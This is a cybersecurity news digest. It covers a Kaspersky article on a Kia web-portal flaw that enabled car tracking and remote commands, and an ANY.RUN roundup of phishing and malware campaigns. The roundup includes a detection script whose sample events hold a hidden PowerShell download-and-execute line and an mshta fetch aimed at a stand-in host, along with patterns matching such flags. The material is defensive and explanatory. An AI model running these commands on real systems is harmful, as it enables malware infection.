Put End-of-Life Software to Rest

Relying on EOL software leaves critical systems exposed — making it a problem no business can afford to ignore.

darkreading – Read More

Abstract Security Raises $15 Million in Series A Funding

Abstract Security has raised $15 million in an oversubscribed Series A funding round led by Munich Re Ventures.

The post Abstract Security Raises $15 Million in Series A Funding appeared first on SecurityWeek.

SecurityWeek – Read More

Cybercriminals Pose a Greater Threat of Disruptive US Election Hacks Than Russia or China

A report distributed by the US Department of Homeland Security warned that financially motivated cybercriminals are more likely to attack US election infrastructure than state-backed hackers.

Security Latest – Read More

How to track Kia car owners online | Kaspersky official blog

A group of security researchers discovered a serious vulnerability in the web portal of the South Korean car manufacturer Kia, which allowed cars to be hacked remotely and their owners tracked. To carry out the hack, only the victim’s car license plate number was needed. Let’s dive into the details.

Overly connected cars

If you think about it, in the last couple of decades, cars have essentially become big computers on wheels. Even the less “smart” models are packed with electronics and equipped with a range of sensors — from sonars and cameras to motion detectors and GPS.

And not only that; in recent years, these computers have been constantly connected to the internet — with all the ensuing risks. Not long ago, we wrote about how today’s cars collect huge amounts of data about their owners and send it to the manufacturer. Moreover, the manufacturers also sell this collected data to other companies — particularly insurers.

However, there’s another side to this issue: being constantly connected to the internet means that, if there are vulnerabilities — either in the car itself or in the cloud system it communicates with — someone could exploit them to hack the system and track the car’s owner without the manufacturer even knowing.

The so-called “head unit” of a car is just the tip of the iceberg; in fact, today’s cars are stuffed with electronics

One bug to rule them all, one bug to find them

This is exactly what happened in this case. Researchers found a vulnerability in Kia’s web portal, which is used by Kia owners and dealers. It turned out that by using the API, the portal allowed anyone to register as a car dealer with just a few fairly simple moves.

The Kia portal in which a serious vulnerability was discovered.

This gave the attacker access to features that even car dealers shouldn’t have — at least, not once the vehicle has been handed over to the customer. Specifically, the portal permits first finding any Kia car, and then accessing the owner’s data (name, phone number, email address, and even physical address) — all with just the vehicle’s VIN number.

It should be noted that VIN numbers aren’t exactly secret information — in some countries, they’re publicly available. For instance, in the USA there are many online services you can use to look up a VIN number using a car’s license plate number.

A general scheme of the Kia web portal attack, allowing control over any car using its VIN number.

After successfully finding the car, the attacker can use the owner’s data to register any attacker-controlled account in Kia’s system as a new user for the vehicle. From there, the attacker would gain access to various functions normally available to the car’s actual owner through the mobile app.

What’s particularly interesting is that all these features weren’t just available to the dealer who sold that car, but to any dealer registered in Kia’s system.
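As an added illustration of the authorization gap described above (this is not code from Kia or from the researchers), here is a small model in which a dealer's access to owner data and to app-user enrollment is scoped to the dealer's own inventory and expires at handover. The vehicle records, dealer ids, role names and function names are all constructed for the example.

```python
from dataclasses import dataclass, field
from enum import Enum
class Lifecycle(Enum):
    IN_STOCK = "in_stock"      # still on the dealer's lot
    DELIVERED = "delivered"    # handed over to a customer

@dataclass
class Vehicle:
    dealer_id: str                              # dealership that holds or sold the car
    state: Lifecycle
    owner: dict = field(default_factory=dict)   # name, phone, email, address
    users: set = field(default_factory=set)     # accounts allowed to send remote commands

class Forbidden(Exception):
    pass

# Constructed inventory: VINs, dealer ids and contact details are made up.
VEHICLES = {
    "VIN-A-0001": Vehicle("dealer-A", Lifecycle.IN_STOCK),
    "VIN-A-0002": Vehicle("dealer-A", Lifecycle.DELIVERED,
                          {"name": "Sample Owner", "email": "owner@example.invalid"},
                          {"owner@example.invalid"}),
}
def lookup_owner_unscoped(dealer_id, vin):
    """Shape of the flaw described above: any dealer account, any VIN, at any time."""
    return VEHICLES[vin].owner

def _dealer_vehicle(dealer_id, vin):
    """Object-level check: the dealer must hold this exact car, and only until handover."""
    v = VEHICLES.get(vin)
    if v is None or v.dealer_id != dealer_id:
        raise Forbidden("vehicle is not in this dealership's inventory")
    if v.state is not Lifecycle.IN_STOCK:
        raise Forbidden("vehicle already delivered; dealer access has expired")
    return v

def lookup_owner_scoped(dealer_id, vin):
    return _dealer_vehicle(dealer_id, vin).owner

def add_vehicle_user(role, actor_id, vin, account):
    """Enrolling an app account: dealers only pre-handover; afterwards only a current user."""
    v = VEHICLES.get(vin)
    if v is None:
        raise Forbidden("unknown vehicle")
    if role == "dealer":
        _dealer_vehicle(actor_id, vin)
    elif actor_id not in v.users:
        raise Forbidden("only a current user of the vehicle may add another")
    v.users.add(account)
    return sorted(v.users)
```

The unscoped function returns any owner's data to any dealer; the scoped variants refuse both a foreign dealer and the selling dealer once the car is delivered, which is the boundary the portal failed to enforce.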

Hacking a car in seconds

The researchers then developed an experimental app that could take control of any Kia vehicle within seconds simply by entering its license plate number into the input fields. The app would automatically find the car’s VIN through the relevant service and use it to register the vehicle to the researchers’ account.

The researchers even created a handy app to simplify hacking — all you need is the Kia car’s license plate number.

After that, a single button press in the app would allow the attacker to obtain the vehicle’s current coordinates, lock or unlock the doors, start or stop the engine, or honk the horn.

The app could be used to obtain the hacked car’s coordinates and send commands.

It’s important to note that in most cases these functions wouldn’t be enough to steal the car. Modern models are usually equipped with immobilizers, which require the physical presence of the key to be disabled. There are some exceptions, but generally these are the cheapest cars that are unlikely to be of much interest to thieves.

Nevertheless, this vulnerability could easily be used to track the car owner, steal valuables left inside the car (or plant something there), or simply disrupt the driver’s life with unexpected actions from the vehicle.

The researchers followed responsible disclosure protocol, informing the manufacturer of the issue and only publishing their findings after Kia fixed the bug. However, they note that they’ve found similar vulnerabilities before and are confident they’ll continue to discover more in the future.

Kaspersky official blog – Read More

AP Sources: Chinese Hackers Targeted Phones of Trump, Vance, People Associated With Harris Campaign

Chinese hackers engaged in a broader espionage operation targeted cellphones used by Donald Trump, JD Vance, and the Kamala Harris campaign.

The post AP Sources: Chinese Hackers Targeted Phones of Trump, Vance, People Associated With Harris Campaign appeared first on SecurityWeek.

SecurityWeek – Read More

‘All servers’ for Redline and Meta infostealers hacked by Dutch police and FBI

Authorities said Operation Magnus “gained full access” to the servers for malware known as Redline and Meta, both of which are popular among cybercriminals.

The Record from Recorded Future News – Read More

Is Firefox Password Manager Secure?

Like other password managers, there are risks and drawbacks to consider before trusting Firefox Password Manager with your credentials.

Security | TechRepublic – Read More

Four REvil Ransomware Group Members Sentenced to Prison in Russia

Four members of the REvil ransomware group, arrested in 2022, were last week sentenced to prison by a Russian court.

The post Four REvil Ransomware Group Members Sentenced to Prison in Russia appeared first on SecurityWeek.

SecurityWeek – Read More

Recent Cyber Attacks Discovered by ANY.RUN: October 2024

Identifying new cyber threats is no simple task. They’re always evolving, adapting, and finding new ways to slip through the defenses.  

But no stress—ANY.RUN has you covered! 

Our team of researchers is always on the lookout, analyzing the latest attacks to keep you informed.

In this article, we’re sharing some of the most recent threats our team has uncovered over the past month. Let’s dive in and see what’s out there! 

APT-C-36, aka BlindEagle, Campaign in LATAM 

Original post on X

APT-C-36, better known as BlindEagle, is a group that has been actively targeting the LATAM region for years. Their primary goal? To gain remote control of victims’ devices through continuous phishing attacks, installing Remote Access Tools (RATs) like Remcos and AsyncRAT for financial gain. 

Attack details 

Information on the APT-C-36 attack

We discovered that in recent cases attackers invite victims to an online court hearing via email. This official-sounding invitation creates a sense of urgency, pushing the target to download the malicious payload. 

You can view analysis of this attack inside ANY.RUN’s sandbox.

Phishing email with fake invitation in ANY.RUN’s sandbox

To deliver their malware, BlindEagle often relies on well-known online services, such as:  

Discord

Google Drive

Bitbucket  

Pastee  

YDRAY

This tactic helps them bypass certain security filters since these services are typically trusted by users. 

The malicious payload is stored in the archive, which is usually protected by a password that can be found in the initial email.

Thanks to ANY.RUN’s interactivity, you can manually enter the password right inside the sandbox.

As mentioned, BlindEagle uses Remcos and AsyncRAT as its primary tools for remote access. The current attack involved Remcos distribution.

ANY.RUN provides helpful tags specifying the identified threats

In the current analysis session, we observed a Remcos RAT connection attempting communication with a Command and Control (C2) server.  

Remcos command and control activity detected

This activity involves establishing a TLS connection to an external server, which was immediately flagged by a Suricata IDS rule in the ANY.RUN sandbox.

Threat Intelligence on APT-C-36 attacks 

To collect intel on other attacks belonging to BlindEagle’s campaigns, you can use ANY.RUN’s Threat Intelligence Lookup.

Specify the country from where the phishing sample originated:
submissionCountry:"Co"

Filter for sessions that involve an email client, like Outlook:
commandLine:"OUTLOOK.EXE"

Since the payload is often stored in an archive, filter for an archiving tool, such as WinRAR:
commandLine:"WinRAR"

Look for sessions flagged as suspicious or malicious:
threatLevel:"malicious"

To find active RATs like Remcos, add a condition for Remote Access Tools:
threatName:"rat"

Here is the final query:

The search takes just a few seconds and reveals a wealth of information.

The service returns a hundred samples of APT-C-36 and other similar attacks

TI Lookup offers a list of samples matching the query, each with its corresponding sandbox analysis. You can navigate to any sandbox session of interest to explore these threats further.


Fake CAPTCHA Exploitation to Deliver Lumma 

Original post on X

Another phishing campaign discovered by ANY.RUN’s team exploited fake CAPTCHA prompts to execute malicious code, delivering Lumma malware onto victims’ systems. 

Attack details

Fake CAPTCHA attack

In this phishing attack, victims were lured to a compromised website and asked to complete a CAPTCHA. They either needed to verify their human identity or fix non-existent display errors on the page. 

The campaign included different fake messages

Once the user clicked the fake CAPTCHA button, the attackers prompted them to copy and run a malicious PowerShell script through the Windows “Run” function (WIN+R).

Malicious process execution via PowerShell shown in the ANY.RUN sandbox

The instruction deceived users into executing harmful code, leading to system infection with Lumma malware for further exploitation.
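As an added detection example (not code from ANY.RUN or from the campaign), the chain described above has a recognizable process-tree shape: the Run dialog launches its target directly under explorer.exe, so a script host spawned there with download-and-execute flags is worth alerting on. The event records below are constructed, and the field names are an assumption about what a sandbox process tree or EDR exposes.

```python
import json
import re

# Constructed process-creation events (not real telemetry): parent image, child image
# and command line, the fields a sandbox process tree or EDR would typically expose.
SAMPLE_EVENTS = r"""
{"parent": "explorer.exe", "image": "powershell.exe", "cmd": "powershell -w hidden -ep bypass -c \"iex (iwr http://example.invalid/x.txt -UseBasicParsing)\""}
{"parent": "explorer.exe", "image": "notepad.exe", "cmd": "notepad.exe C:\\Users\\user\\notes.txt"}
{"parent": "cmd.exe", "image": "powershell.exe", "cmd": "powershell -File C:\\scripts\\backup.ps1"}
{"parent": "explorer.exe", "image": "mshta.exe", "cmd": "mshta http://example.invalid/verify.hta"}
""".strip()

# The Run dialog (WIN+R) spawns its target directly under explorer.exe, so the
# fake-CAPTCHA chain shows up as explorer.exe -> script host with download/execute flags.
RUN_DIALOG_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
SUSPICIOUS_FLAGS = [
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"-e(?:p|xecutionpolicy)\s+bypass", "execution policy bypass"),
    (r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b", "web download"),
    (r"\b(?:iex|invoke-expression)\b", "in-memory execution"),
    (r"https?://", "remote URL"),
]

def analyze_event(event):
    """Return an alert dict for a Run-dialog script-host launch with suspicious flags, else None."""
    image, parent, cmd = event["image"].lower(), event["parent"].lower(), event["cmd"]
    if image not in SCRIPT_HOSTS or parent not in RUN_DIALOG_PARENTS:
        return None
    reasons = [label for pat, label in SUSPICIOUS_FLAGS if re.search(pat, cmd, re.IGNORECASE)]
    if not reasons:
        return None
    return {"image": image, "score": len(reasons), "reasons": reasons}

def scan(lines):
    """Parse one JSON event per line and collect alerts."""
    alerts = []
    for line in lines.splitlines():
        if line.strip():
            alert = analyze_event(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a['image']}: score {a['score']} ({', '.join(a['reasons'])})")
```

On the sample data the PowerShell launch scores on five indicators and the mshta launch on one, while the same PowerShell flags under cmd.exe (a scheduled or scripted parent) are left alone; in production the parent filter is what keeps ordinary admin scripting out of the alert queue.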

More samples of the campaign

For further investigation into attacks leveraging fake CAPTCHA prompts, you can use ANY.RUN’s TI Lookup to locate additional samples and associated data.

As part of your search query, you can use a domain involved in the attack:

TI Lookup identifies the domain as malicious and offers additional threat context

This query reveals multiple related domains, IP addresses, and sandbox sessions tied to the attacks outlined above.

Abuse of Encoded JavaScript

Original post on X

We also identified a growing use of encoded JavaScript files for hidden script execution.

Microsoft originally developed Script Encoder as a way for developers to obfuscate JavaScript and VBScript, making the code unreadable while remaining functional through interpreters like wscript.

Intended as a protective measure, Script Encoder has also become a resource for attackers. By encoding harmful JavaScript in .jse files, cybercriminals can embed malware in scripts that look legitimate, tricking users into running the malicious code. 

Steps for decoding a JS script

This type of obfuscation not only conceals the code but also complicates detection, as security tools struggle to identify the harmful intent within the encoded data.

Encoded .jse files are commonly delivered through phishing emails or drive-by-downloads.  

See the analysis of a .jse file disguised as calculator software in the ANY.RUN sandbox.

The ANY.RUN sandbox lets you see how a script executes

Using the built-in Script Tracer feature, you can view the entire script execution process without decoding the script manually.

Conclusion

Our analysts are constantly on the lookout for emerging phishing and malware attacks, as well as new malicious techniques used by cyber criminals. To stay updated on the latest research of ANY.RUN’s team, make sure to follow us on X, LinkedIn, YouTube, Facebook, and other social media.

About ANY.RUN  

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

With ANY.RUN you can: 

Detect malware in seconds

Interact with samples in real time

Save time and money on sandbox setup and maintenance 

Record and study all aspects of malware behavior

Collaborate with your team 

Scale as you need


The post Recent Cyber Attacks Discovered by ANY.RUN: October 2024 appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More

Delta Sues Cybersecurity Firm CrowdStrike Over Tech Outage That Canceled Flights

Delta Air Lines has sued CrowdStrike, claiming the cybersecurity company had cut corners and caused a worldwide technology outage that led to thousands of canceled flights in July.

The post Delta Sues Cybersecurity Firm CrowdStrike Over Tech Outage That Canceled Flights appeared first on SecurityWeek.

SecurityWeek – Read More